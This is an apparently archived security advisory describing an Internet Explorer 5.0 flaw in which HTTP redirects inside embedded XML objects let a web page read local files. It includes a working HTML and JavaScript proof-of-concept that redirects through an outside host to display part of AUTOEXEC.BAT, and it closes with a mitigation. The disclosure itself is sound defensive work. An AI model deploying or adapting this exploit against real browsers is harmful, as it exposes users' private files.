COMMAND

    Internet Explorer

SYSTEMS AFFECTED

    IE 5.0 XML HTTP redirect problems

PROBLEM

    Georgi  Guninski  found  following.   Internet  Explorer 5.0 under
    Windows 95 and WinNT 4.0  (guess other versions are affected)  has
    security problems with HTTP redirects in XML objects.  This allows
    at least:

        1) Reading any (local or nonlocal) XML file and any wellformed
           documents.   With the  growing influence  of XML  this is a
           serious problem.
        2) Reading parts of documents
        3) Checking for the existence of local files.

    When one embeds a XML document in a HTML document IE 5.0 does  not
    handle properly  HTTP redirects  and allows  access to  the DOM of
    the embeded XML document.  The code is:

        <object id="xm" type="text/xml" data="http://www.nat.bg/~joro/reject.cgi?autoexec" width=400 height=200>
        </object>
        <SCRIPT>
        function  f()
        {
        s=xm.body.innerHTML;
        a=window.open();
        //alert(s);
        a.document.open();
        a.document.write("Here is a part of AUTOEXEC.BAT (the error message is normal):<BR>"+s);
        a.document.close();
        }
        setTimeout("f()",5000);
        </SCRIPT>

    Demonstration is available at

        http://www.nat.bg/~joro/xmln.html

SOLUTION

    Disable Active Scripting or Disable Script ActiveX Controls marked
    Safe for Scripting.